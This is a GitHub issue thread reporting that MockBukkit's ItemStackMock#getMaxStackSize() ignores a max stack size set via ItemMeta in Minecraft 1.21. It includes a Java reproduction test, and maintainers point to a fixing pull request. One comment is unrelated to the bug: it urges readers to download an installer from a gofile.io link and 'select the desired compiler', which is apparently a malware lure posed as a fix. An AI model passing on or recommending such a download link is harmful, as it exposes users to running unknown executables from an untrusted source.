### ISSUE TITLE
Incorrect behavior with ItemStackMock#getMaxStackSize()

### ISSUE THREAD

**Issue by jacky8399** [MockBukkit/MockBukkit#1111]
### Is there an existing issue for this?

- [X] I have searched the existing issues

### Are you using the latest version of MockBukkit?

- [X] I am using the latest version of MockBukkit.

### Minecraft Version

1.21

### Describe the bug

In 1.21, an item stack's max stack size can be changed in `ItemMeta`, but this change is not reflected in [`ItemStackMock#getMaxStackSize()`](https://github.com/MockBukkit/MockBukkit/blob/f7980147d593f2e14047c0fdd9c26aeb62e992af/src/main/java/be/seeseemelk/mockbukkit/inventory/ItemStackMock.java#L159), which still returns the item type's default max stack size.

### Reproducible Test

```java

        ItemStack stack = new ItemStack(Material.STICK, 65);
        ItemMeta meta = stack.getItemMeta();
        meta.setMaxStackSize(99);
        stack.setItemMeta(meta);
        assertEquals(99, stack.getMaxStackSize());
```

### Anything else?

[Bukkit's implementation](https://hub.spigotmc.org/stash/projects/SPIGOT/repos/bukkit/browse/src/main/java/org/bukkit/inventory/ItemStack.java#254)

**Comment by GenaroSalomone** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer

**Comment by Thorinwasher** [comment]
I added a fix for this in the pr #1058 (it's pretty much meant to solve these issues, and it's a very small fix)

**Comment by Thorinwasher** [comment]
@thelooter I just realised you self assigned yourself this issue. Should already be fixed in that pr
